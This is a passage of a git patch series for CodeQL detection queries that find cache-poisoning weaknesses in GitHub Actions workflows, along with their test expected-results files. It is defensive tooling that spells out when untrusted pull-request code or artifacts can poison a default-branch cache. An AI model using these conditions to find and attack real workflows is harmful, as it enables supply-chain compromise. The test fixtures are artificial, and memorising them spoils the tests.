= cache_path.regexpReplaceAll("/$", "") + ) and + ( + untrusted_path.regexpMatch("^[a-zA-Z0-9_-].*") and + normalized_untrusted_path = "./" + untrusted_path.regexpReplaceAll("/$", "") + or + normalized_untrusted_path = untrusted_path.regexpReplaceAll("/$", "") + ) and + normalized_cache_path.substring(0, normalized_untrusted_path.length()) = + normalized_untrusted_path + ) +} + query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, Event e, Step artifact, Step s +from LocalJob j, Event e, Step source, Step s, string message, string path where ( - artifact instanceof PRHeadCheckoutStep or - artifact instanceof UntrustedArtifactDownloadStep + source instanceof PRHeadCheckoutStep and + message = "due to privilege checkout of untrusted code." and + path = source.(PRHeadCheckoutStep).getPath() + or + source instanceof UntrustedArtifactDownloadStep and + message = "due to downloading an untrusted artifact." and + path = source.(UntrustedArtifactDownloadStep).getPath() ) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and // the checkout is not controlled by an access check - not exists(ControlCheck check | check.protects(artifact, j.getATriggerEvent())) and + not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) @@ -43,19 +71,29 @@ where ) ) and // the job checkouts untrusted code from a pull request - j.getAStep() = artifact and + j.getAStep() = source and ( // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) j.getAStep() = s and s instanceof CacheWritingStep and + ( + // we dont know what code can be controlled by the attacker + path = "?" + or + // we dont know what files are being cached + s.(CacheWritingStep).getPath() = "?" + or + // the cache writing step reads from the path the attacker can control + not path = "?" and controlledCachePath(s.(CacheWritingStep).getPath(), path) + ) and not s instanceof PoisonableStep or // the job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) - artifact.getAFollowingStep() = s and + source.getAFollowingStep() = s and s instanceof PoisonableStep and // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select s, artifact, s, "Potential cache poisoning in the context of the default branch" +select s, source, s, "Potential cache poisoning in the context of the default branch" + message From 14f1672e740dae8beb881e5b895c73f443e5437c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:54:26 +0200 Subject: [PATCH 0454/1267] Fix query message --- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- .../Security/CWE-349/CachePoisoning.expected | 45 ++++++++++--------- 2 files changed, 24 insertions(+), 23 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 3f2bb8db472..3807cb4b592 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -96,4 +96,4 @@ where // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select s, source, s, "Potential cache poisoning in the context of the default branch" + message +select s, source, s, "Potential cache poisoning in the context of the default branch " + message diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 2ad477a2a8b..fdaf0cf25ad 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -73,25 +73,26 @@ edges | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | | .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:30:9:35:36 | Uses Step | #select -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to downloading an untrusted artifact. | From fbc2e1e7e807de23e871df121b71b4a41cfc3ec1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 10:47:12 +0200 Subject: [PATCH 0455/1267] Remove caching actions that cache files outside of the CWD --- .../actions/security/CachePoisoningQuery.qll | 81 +------------------ 1 file changed, 3 insertions(+), 78 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 8c1a9ee0fd7..56002cb2b16 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -51,87 +51,13 @@ abstract class CacheWritingStep extends Step { class CacheActionUsesStep extends CacheWritingStep, UsesStep { CacheActionUsesStep() { this.getCallee() = "actions/cache" } - override string getPath() { - if exists(this.(UsesStep).getArgument("path")) - then result = this.(UsesStep).getArgument("path").splitAt("\n") - else result = "?" - } + override string getPath() { result = this.(UsesStep).getArgument("path").splitAt("\n") } } class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep { CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" } - override string getPath() { - if exists(this.(UsesStep).getArgument("path")) - then result = this.(UsesStep).getArgument("path").splitAt("\n") - else result = "?" - } -} - -class SetupJavaUsesStep extends CacheWritingStep, UsesStep { - SetupJavaUsesStep() { - this.getCallee() = "actions/setup-java" and - ( - exists(this.getArgument("cache")) or - exists(this.getArgument("cache-dependency-path")) - ) - } - - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" } -} - -class SetupGoUsesStep extends CacheWritingStep, UsesStep { - SetupGoUsesStep() { - this.getCallee() = "actions/setup-go" and - ( - not exists(this.getArgument("cache")) - or - this.getArgument("cache") = "true" - ) - } - - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" } -} - -class SetupNodeUsesStep extends CacheWritingStep, UsesStep { - SetupNodeUsesStep() { - this.getCallee() = "actions/setup-node" and - ( - exists(this.getArgument("cache")) or - exists(this.getArgument("cache-dependency-path")) - ) - } - - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" } -} - -class SetupPythonUsesStep extends CacheWritingStep, UsesStep { - SetupPythonUsesStep() { - this.getCallee() = "actions/setup-python" and - ( - exists(this.getArgument("cache")) or - exists(this.getArgument("cache-dependency-path")) - ) - } - - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" } -} - -class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { - SetupDotnetUsesStep() { - this.getCallee() = "actions/setup-dotnet" and - ( - this.getArgument("cache") = "true" or - exists(this.getArgument("cache-dependency-path")) - ) - } - - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" } + override string getPath() { result = this.(UsesStep).getArgument("path").splitAt("\n") } } class SetupRubyUsesStep extends CacheWritingStep, UsesStep { @@ -140,6 +66,5 @@ class SetupRubyUsesStep extends CacheWritingStep, UsesStep { this.getArgument("bundler-cache") = "true" } - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" } + override string getPath() { result = "vendor/bundle" } } From d18179850d6fc9557172372376dfc81aa993c939 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 12:04:34 +0200 Subject: [PATCH 0456/1267] Split Cache Poisoning queries in 3 Split them into 3 queries depending of how the cache can be poisoned: - control of cached files - execution of controlled code - code injection Remove `setup-XXX` actions from CacheWriting class since the cached files are not in the CWD --- ...n.ql => CachePoisoningViaCodeInjection.ql} | 2 +- ...ing.ql => CachePoisoningViaDirectCache.ql} | 49 ++++------ .../CachePoisoningViaPoisonableStep.ql | 58 +++++++++++ .../{test9.yml => code_injection1.yml} | 0 .../.github/workflows/code_injection2.yml | 16 +++ .../{test1.yml => direct_cache1.yml} | 0 .../{test2.yml => direct_cache2.yml} | 0 .../{test11.yml => direct_cache3.yml} | 0 .../{test15.yml => direct_cache4.yml} | 0 .../{test16.yml => direct_cache5.yml} | 0 .../{test23.yml => direct_cache6.yml} | 0 .../{test10.yml => neg_code_injection1.yml} | 0 .../{test13.yml => neg_direct_cache1.yml} | 0 .../{test14.yml => neg_direct_cache2.yml} | 0 .../{test22.yml => neg_direct_cache3.yml} | 0 .../{test12.yml => neg_poisonable_step1.yml} | 0 .../{test18.yml => neg_poisonable_step2.yml} | 16 +-- .../CWE-349/.github/workflows/poc.yml | 63 ------------ .../CWE-349/.github/workflows/poc2.yml | 58 ----------- .../CWE-349/.github/workflows/poc3.yml | 64 ------------ .../{test8.yml => poisonable_step1.yml} | 0 .../{test17.yml => poisonable_step2.yml} | 0 .../.github/workflows/poisonable_step3.yml | 19 ++++ .../.github/workflows/poisonable_step4.yml | 18 ++++ .../.github/workflows/poisonable_step5.yml | 28 ++++++ .../CWE-349/.github/workflows/test19.yml | 42 -------- .../CWE-349/.github/workflows/test20.yml | 46 --------- .../CWE-349/.github/workflows/test21.yml | 44 --------- .../CWE-349/.github/workflows/test3.yml | 23 ----- .../CWE-349/.github/workflows/test4.yml | 21 ---- .../CWE-349/.github/workflows/test5.yml | 19 ---- .../CWE-349/.github/workflows/test6.yml | 18 ---- .../CWE-349/.github/workflows/test7.yml | 17 ---- .../Security/CWE-349/CachePoisoning.expected | 98 ------------------- .../Security/CWE-349/CachePoisoning.qlref | 2 - .../CachePoisoningByCodeInjection.expected | 20 ---- .../CachePoisoningByCodeInjection.qlref | 2 - .../CachePoisoningViaCodeInjection.expected | 11 +++ .../CachePoisoningViaCodeInjection.qlref | 2 + .../CachePoisoningViaDirectCache.expected | 48 +++++++++ .../CachePoisoningViaDirectCache.qlref | 2 + .../CachePoisoningViaPoisonableStep.expected | 49 ++++++++++ .../CachePoisoningViaPoisonableStep.qlref | 2 + 43 files changed, 275 insertions(+), 582 deletions(-) rename ql/src/Security/CWE-349/{CachePoisoningByCodeInjection.ql => CachePoisoningViaCodeInjection.ql} (96%) rename ql/src/Security/CWE-349/{CachePoisoning.ql => CachePoisoningViaDirectCache.ql} (68%) create mode 100644 ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test9.yml => code_injection1.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test1.yml => direct_cache1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test2.yml => direct_cache2.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test11.yml => direct_cache3.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test15.yml => direct_cache4.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test16.yml => direct_cache5.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test23.yml => direct_cache6.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test10.yml => neg_code_injection1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test13.yml => neg_direct_cache1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test14.yml => neg_direct_cache2.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test22.yml => neg_direct_cache3.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test12.yml => neg_poisonable_step1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test18.yml => neg_poisonable_step2.yml} (54%) delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test8.yml => poisonable_step1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test17.yml => poisonable_step2.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoning.expected delete mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref delete mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected delete mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql similarity index 96% rename from ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql rename to ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index e7f1385f3cd..685bdcca401 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql @@ -1,5 +1,5 @@ /** - * @name Cache Poisoning via low-privilege code injection + * @name Cache Poisoning via low-privileged code injection * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. * @kind path-problem * @problem.severity error diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql similarity index 68% rename from ql/src/Security/CWE-349/CachePoisoning.ql rename to ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index 3807cb4b592..ea36bcf0be1 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql @@ -1,11 +1,11 @@ /** - * @name Cache Poisoning + * @name Cache Poisoning via caching of untrusted files * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. * @kind path-problem * @problem.severity error * @precision high * @security-severity 7.5 - * @id actions/cache-poisoning + * @id actions/cache-poisoning/direct-cache * @tags actions * security * external/cwe/cwe-349 @@ -45,6 +45,8 @@ query predicate edges(Step a, Step b) { a.getNextStep() = b } from LocalJob j, Event e, Step source, Step s, string message, string path where + // the job checkouts untrusted code from a pull request or downloads an untrusted artifact + j.getAStep() = source and ( source instanceof PRHeadCheckoutStep and message = "due to privilege checkout of untrusted code." and @@ -54,46 +56,35 @@ where message = "due to downloading an untrusted artifact." and path = source.(UntrustedArtifactDownloadStep).getPath() ) and + // the checkout/download is not controlled by an access check + not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) or - // the workflow caller runs in the context of the default branch + // the workflow's caller runs in the context of the default branch e.getName() = "workflow_call" and exists(ExternalJob caller | caller.getCallee() = j.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) ) and - // the job checkouts untrusted code from a pull request - j.getAStep() = source and + // the job writes to the cache + // (No need to follow the checkout/download step since the cache is normally write after the job completes) + j.getAStep() = s and + s instanceof CacheWritingStep and ( - // the job writes to the cache - // (No need to follow the checkout step as the cache writing is normally done after the job completes) - j.getAStep() = s and - s instanceof CacheWritingStep and - ( - // we dont know what code can be controlled by the attacker - path = "?" - or - // we dont know what files are being cached - s.(CacheWritingStep).getPath() = "?" - or - // the cache writing step reads from the path the attacker can control - not path = "?" and controlledCachePath(s.(CacheWritingStep).getPath(), path) - ) and - not s instanceof PoisonableStep + // we dont know what code can be controlled by the attacker + path = "?" or - // the job executes checked-out code - // (The cache specific token can be leaked even for non-privileged workflows) - source.getAFollowingStep() = s and - s instanceof PoisonableStep and - // excluding privileged workflows since they can be exploited in easier circumstances - not j.isPrivileged() - ) + // we dont know what files are being cached + s.(CacheWritingStep).getPath() = "?" + or + // the cache writing step reads from a path the attacker can control + not path = "?" and controlledCachePath(s.(CacheWritingStep).getPath(), path) + ) and + not s instanceof PoisonableStep select s, source, s, "Potential cache poisoning in the context of the default branch " + message diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql new file mode 100644 index 00000000000..ee2719f0611 --- /dev/null +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql @@ -0,0 +1,58 @@ +/** + * @name Cache Poisoning via execution of untrusted code + * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. + * @kind path-problem + * @problem.severity error + * @precision high + * @security-severity 7.5 + * @id actions/cache-poisoning/poisonable-step + * @tags actions + * security + * external/cwe/cwe-349 + */ + +import actions +import codeql.actions.security.ArtifactPoisoningQuery +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.CachePoisoningQuery +import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks + +query predicate edges(Step a, Step b) { a.getNextStep() = b } + +from LocalJob j, Event e, Step source, Step s, string message, string path +where + // the job checkouts untrusted code from a pull request or downloads an untrusted artifact + j.getAStep() = source and + ( + source instanceof PRHeadCheckoutStep and + message = "due to privilege checkout of untrusted code." and + path = source.(PRHeadCheckoutStep).getPath() + or + source instanceof UntrustedArtifactDownloadStep and + message = "due to downloading an untrusted artifact." and + path = source.(UntrustedArtifactDownloadStep).getPath() + ) and + // the checkout/download is not controlled by an access check + not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and + j.getATriggerEvent() = e and + // job can be triggered by an external user + e.isExternallyTriggerable() and + ( + // the workflow runs in the context of the default branch + runsOnDefaultBranch(e) + or + // the workflow's caller runs in the context of the default branch + e.getName() = "workflow_call" and + exists(ExternalJob caller | + caller.getCallee() = j.getLocation().getFile().getRelativePath() and + runsOnDefaultBranch(caller.getATriggerEvent()) + ) + ) and + // the job executes checked-out code + // (The cache specific token can be leaked even for non-privileged workflows) + source.getAFollowingStep() = s and + s instanceof PoisonableStep and + // excluding privileged workflows since they can be exploited in easier circumstances + not j.isPrivileged() +select s, source, s, "Potential cache poisoning in the context of the default branch " + message diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml rename to 